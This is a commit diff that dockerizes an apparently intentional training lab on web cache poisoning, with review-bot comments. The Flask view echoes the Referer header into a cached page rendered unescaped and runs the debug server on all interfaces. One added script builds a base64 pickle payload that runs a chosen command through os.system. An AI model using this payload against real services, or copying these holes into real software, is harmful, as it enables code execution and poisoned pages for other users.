Commit 2b34727

Caache poisoning - dockerized and updated
1 parent 90f9356 commit 2b34727


8 files changed

+143
-11
lines changed


‎CachePoisoning/1/requirements.txt‎

Lines changed: 0 additions & 2 deletions
This file was deleted.
Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
FROM python:3
2+
3+
#Install and update system dependencies
4+
RUN apt update -y; apt install -y supervisor
5+
RUN pip install flask Flask-Caching
6+
7+
#Prepare and setup the working directory
8+
RUN mkdir -p /app
9+
WORKDIR /app
10+
COPY vsnippet .
11+
COPY config/supervisord.conf /etc/supervisord.conf
12+
13+
EXPOSE 1337
14+
15+
#Disable pycache
16+
ENV PYTHONDONTWRITEBYTECODE=1
17+
18+
ENTRYPOINT [ "/usr/bin/supervisord", "-c", "/etc/supervisord.conf" ]
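Review bot: Neither the base image nor the Python packages are pinned: `FROM python:3` and `RUN pip install flask Flask-Caching` resolve to whatever is current at build time, and this commit also deletes requirements.txt. For a lab whose behaviour depends on how Flask-Caching builds its cache key, a later release can silently change or break the exercise, and an unpinned install widens supply-chain exposure. I would pin both, for example `FROM python:<PINNED_TAG>` and `RUN pip install flask==<PINNED_VERSION> Flask-Caching==<PINNED_VERSION>` (placeholders; use the versions the snippet was tested with). Separately, `apt update -y; apt install -y supervisor` joins the commands with `;`, so a failed update does not fail the build; `&&` would.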
Lines changed: 13 additions & 0 deletions
@@ -0,0 +1,13 @@
1+
[supervisord]
2+
user=root
3+
nodaemon=true
4+
logfile=/dev/null
5+
logfile_maxbytes=0
6+
pidfile=/run/supervisord.pid
7+
8+
[program:flask]
9+
command=python -B /app/27-cache-poisoning-classic.py
10+
stdout_logfile=/dev/stdout
11+
stdout_logfile_maxbytes=0
12+
stderr_logfile=/dev/stderr
13+
stderr_logfile_maxbytes=0
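Review bot: The `[program:flask]` section sets no `user=`, so the Flask process inherits root from `[supervisord]` (`user=root`). The application in this commit is intentionally vulnerable and is started with `debug=True`, so anything that goes wrong beyond the intended exercise runs with full privileges inside the container. Adding `user=nobody` (or a dedicated account created in the Dockerfile) under `[program:flask]` keeps the lesson intact while limiting that. The cache configuration is not fully visible in this diff; if the backend writes to disk, the chosen account needs write access to that path.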
Lines changed: 9 additions & 0 deletions
@@ -0,0 +1,9 @@
1+
version: '3.8'
2+
services:
3+
python-flask:
4+
container_name: vsnippet-cache-poisoning-classic-27
5+
build:
6+
context: .
7+
dockerfile: Dockerfile
8+
ports:
9+
- 1337:1337
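Review bot: `- 1337:1337` publishes the port on every host interface, so a deliberately vulnerable app running the Flask debug server becomes reachable from the surrounding network and not only from the trainee's own machine. Binding to loopback, `- "127.0.0.1:1337:1337"`, keeps the lab local. The top-level `version: '3.8'` key is ignored by current Compose releases and can be dropped.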
Lines changed: 26 additions & 0 deletions
@@ -0,0 +1,26 @@
1+
#!/usr/bin/python3
2+
import os, base64, pickle
3+
4+
ic = {
5+
'k': '[033円[1;32mOK033円[0m] ',
6+
'i': '[033円[1;34mINF033円[0m] ',
7+
'w': '[033円[33mWRN033円[0m] ',
8+
'f': '[033円[1;31mFAI033円[0m] ',
9+
}
10+
11+
class Exploit(object):
12+
def __reduce__(self):
13+
return (os.system,(cmd,))
14+
15+
#User input:
16+
print("Exploit 17-Vsnippet | YesWeHack")
17+
cmd = str(input(ic['i']+' Command to execute with the exploit: '))
18+
19+
#Default set cmd:
20+
if cmd in ['', ' ', '\t']:
21+
print(ic['w']+'No command default command set => whoami')
22+
cmd = 'whoami'
23+
24+
#Payload setup & verbose:
25+
payload = base64.b64encode(pickle.dumps(Exploit()))
26+
print(ic['k'], payload.decode('ascii'))
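Review bot: This script does not appear to belong to this snippet: its banner reads `Exploit 17-Vsnippet` and it serialises a pickle object, while the Flask view changed in this commit shows no deserialisation of request data. If it was copied over from another exercise it should be removed from this directory. If it is intentional, a header comment stating which snippet and which behaviour it demonstrates would stop readers from assuming the cache-poisoning app unpickles input.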
@@ -1,15 +1,14 @@
1-
from flask import Flask, request
1+
#!/usr/bin/python3
2+
from flask import Flask, render_template, request
23
from flask_caching import Cache
4+
from ignore.design import design
35
import datetime
4-
app = Flask(__name__)
6+
app = design.Design(Flask(__name__), __file__, 'Vsnippet #27 - Cache poisoning classic')
57

68
##
79
# YesWeHack - Vulnerable Code Snippet
810
##
911

10-
#Install: pip install -r requirements.txt
11-
#Run: python3 27-new.py
12-
1312
#Setup cache configurations:
1413
config = {
1514
"DEBUG": True,
@@ -21,15 +20,14 @@
2120
@app.route("/")
2221
@cache.cached(timeout=10)
2322
def index():
24-
2523
HTMLContent = '''
2624
<div id="cache_info">
2725
<p> The page was cached at: [%s] </p>
2826
<p> The user was redirected from: [%s] </p>
2927
</div>
3028
''' % (str(datetime.datetime.now()), str(request.headers.get("Referer")))
3129

32-
return HTMLContent
30+
return render_template('index.html', result=HTMLContent)
3331

34-
if __name__=='__main__':
35-
app.run(debug=True)
32+
if __name__=='__main__':
33+
app.run(host='0.0.0.0', port=1337, debug=True)
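Review bot: `app.run(host='0.0.0.0', port=1337, debug=True)` exposes the Werkzeug debugger on every interface of the container, which is a second, unintended weakness on top of the cache-poisoning lesson. The exercise only needs the `Referer` header to reach the cached response (here via `result=HTMLContent`, rendered with `{{ result | safe }}` in the template section of this commit), so I would run with `debug=False`. The `"DEBUG": True` entry in the first hunk should be reviewed the same way, although the rest of that dict lies outside the visible lines. A short comment above `@cache.cached(timeout=10)` such as `# Intentionally vulnerable: the response embeds the Referer header, which is not part of the cache key` would make clear which behaviour is deliberate.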
Lines changed: 17 additions & 0 deletions
@@ -0,0 +1,17 @@
1+
from flask import Flask
2+
#Note : (This code is never a part of the vulnerable code snippet. It's only for design.)
3+
4+
r = '#ff0000'
5+
w = '#ffffff'
6+
g = '#00ff55'
7+
dg = '#00b33c'
8+
b = '#0052cc'
9+
p = '#cc00cc'
10+
s = '#ffcc66'
11+
12+
def Design(app:Flask, file:str, title:str, desc='') -> Flask:
13+
app.config['TITLE'] = title
14+
with open(file, 'r') as f: app.config['SOURCE_CODE'] = ''.join([i for i in f])
15+
16+
return app
17+
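Review bot: `Design` accepts `desc=''` but never uses it, and the seven colour constants above it are unused in this file as shown; either wire them in or drop them. The read can be simplified and made encoding-stable with `with open(file, encoding='utf-8') as f: app.config['SOURCE_CODE'] = f.read()`. A one-line docstring saying that the whole source file is published to every visitor through `config.SOURCE_CODE` would also be worth adding, since that is easy to miss if the helper is reused outside the lab.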
Lines changed: 53 additions & 0 deletions
@@ -0,0 +1,53 @@
1+
<!DOCTYPE html>
2+
<html>
3+
<head>
4+
<title> {{ config.TITLE }} </title>
5+
</head>
6+
<body>
7+
<h1> {{ config.TITLE }} </h1>
8+
9+
<form action="/">
10+
<input type="text" name="search" placeholder="search products...">
11+
<button type="submit">search</button>
12+
</form>
13+
14+
15+
<!--Vsnippet output-->
16+
<h2> {{ result | safe }} </h2>
17+
18+
<style>
19+
@import url("https://fonts.googleapis.com/css2?family=VT323&display=swap");
20+
body {
21+
padding: 2%;
22+
font-family: "VT323", monospace;
23+
background-color: #000;
24+
color: white;
25+
}
26+
input, button {
27+
padding: 10px;
28+
background-color: rgb(10, 10, 10);
29+
border: 2px solid #09d8c4;
30+
border-radius: 10px;
31+
color: white;
32+
}
33+
#Vcode {
34+
z-index: -1;
35+
opacity: 0.8;
36+
position: absolute;
37+
transform: translate(-100%, -100%);
38+
top: 96%;
39+
left: 98%;
40+
word-wrap: break-word;
41+
padding: 2%;
42+
background-color: rgb(10, 10, 10);
43+
border: 2px solid #09d8c4;
44+
border-radius: 10px;
45+
font-size: 14px;
46+
}
47+
</style>
48+
49+
<div id="Vcode">
50+
<pre style="color:#ff8533;">{{ config.SOURCE_CODE }}</pre>
51+
</div>
52+
</body>
53+
</html>
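Review bot: The `@import url("https://fonts.googleapis.com/css2?family=VT323&display=swap")` line makes every visitor's browser contact a third party, so the lab neither works fully offline nor stays self-contained. Since `font-family: "VT323", monospace` already has a fallback, I would drop the import or ship the font file with the image. The `<style>` block also sits inside `<body>`; `<head>` is the conventional place for it. The `search` form field is not read by the view shown in this commit, so a comment saying it is decoration would help.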
